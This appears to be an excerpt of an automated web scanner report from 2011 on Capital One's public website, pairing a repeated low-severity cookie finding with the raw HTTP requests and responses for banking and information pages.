HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:11:53 GMT Server: Apache Location: http://www.capitalone.com/balance-transfer/ Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:11:53 GMT Content-Length: 251 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:52 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66271
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /creditcards/products/browse-all/popular/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:11:51 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D7%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: caponecc=channel%3DUNS%2A20090715%3Atestgroup%3Dtg11%2A20110113; path=/; domain=.capitalone.com Set-Cookie: caponesn=f5b8a110S04syM9LTU6OK7YyMrNSCvULtjIyMLA0MDc01S1JNzTUNTIwNAQiYyXrOENTY3NjAA%3D%3D; expires=Wed, 01-Jan-2020 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=test; path=/creditcards/; domain=www.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 66647
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:19 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponehp=HP73%3ATC00%3Abm%3D9%2C15007; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:20 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:19 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37763
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directbanking/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:14 GMT Server: Apache Location: http://www.capitalone.com/directbanking/ Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:14 GMT Content-Length: 248 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /directbanking/online-banking HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:15 GMT Server: Apache Location: http://www.capitalone.com/directbanking/online-banking/ Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:15 GMT Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>301 Moved Permanently</title> </head><body> <h1>Moved Permanently</h1> <p>The document has moved <a href="http://www.capitalone.c ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-certificates-deposit/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31412
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-checking-accounts/interest-online-checking-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_03_T_SP30&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:17 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:16 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:17 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:17 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 10034
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:12 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:11 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 32067
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/high-yield-money-market-account/ HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:08 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:08 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:07 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 26985
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <h ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/interestplus-online-savings-account/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_01_T_SP29&itc=CAPITALONE1112FYINTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:07 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112FYINTMKTGDF; expires=Sun, 03-Apr-2011 22:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:07 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:06 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 29344
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /directbanking/online-savings-accounts/rewards-money-market-account/index.php?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_HOME_C7_05_T_DBREWMMA&itc=CAPITALONE1112G1INTMKTGDF&number=HSRLutmi4O6tZPn79JErD HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:13 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: itc=CAPITALONE1112G1INTMKTGDF; expires=Sun, 03-Apr-2011 22:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: dbPhoneNumber=HSRLutmi4O6tZPn79JErD; path=/; domain=.capitalone.com Set-Cookie: coirule=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Set-Cookie: LP_GROUP=NDBCHAT_T_GRP; expires=Sun, 03-Apr-2011 21:12:13 GMT; path=/; domain=.capitalone.com Set-Cookie: caponesn=deleted; expires=Tue, 02-Feb-2010 22:12:12 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=utf-8 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 31377
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> < ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /financialeducation/?linkid=WWW_1009_Z_A0B2084C1F86D22A0E1FFBF38F9G1F85H5AF4_GBLFO_F1_06_T_FIN HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:40 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D4; expires=Thu, 02-Feb-2012 22:12:40 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 27487
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Finan ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /financialeducation/creditcardact/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:39 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D2; expires=Thu, 02-Feb-2012 22:12:39 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 24653
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Credi ...[SNIP]...
The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /fraud/prevention/index.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 200 OK Date: Wed, 02 Feb 2011 22:12:37 GMT Server: Apache Cache-Control: no-cache, no-store, must-revalidate Set-Cookie: caponesb=c_m%3D1; expires=Thu, 02-Feb-2012 22:12:37 GMT; path=/; domain=.capitalone.com Vary: Accept-Encoding,User-Agent P3P: policyref="http://www.capitalone.com/w3c/p3p.xml",CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV" Connection: close Content-Type: text/html; charset=ISO-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/ Content-Length: 37509
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"/><title>Capit ...[SNIP]...
The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.
Request
GET /legal/privacy.php HTTP/1.1 Host: www.capitalone.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0100; smartTracking=; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DB; itc=CAPITALONE11NZZZintmktgD4; BIGipServerpl_capitalone.com_443=745088266.65056.0000; caponesn=deleted; v1st=FBBE6C4A1C9B8436; xp1Params=paidOrNatural%3A%3A%3DU%7C%7Csearchterm%3A%3A%3D0%7C%7Creferrer%3A%3A%3D0%7C%7Cinvocation%3A%3A%3D1000;
Response
HTTP/1.1 301 Moved Permanently Date: Wed, 02 Feb 2011 22:12:41 GMT Server: Apache Location: https://www.capitalone.com/protection/privacy/index.php Cache-Control: max-age=0 Expires: Wed, 02 Feb 2011 22:12:41 GMT Content-Length: 263 Connection: close Content-Type: text/html; charset=iso-8859-1 Set-Cookie: BIGipServerpl_capitalone.com_80=812197130.29215.0000; path=/
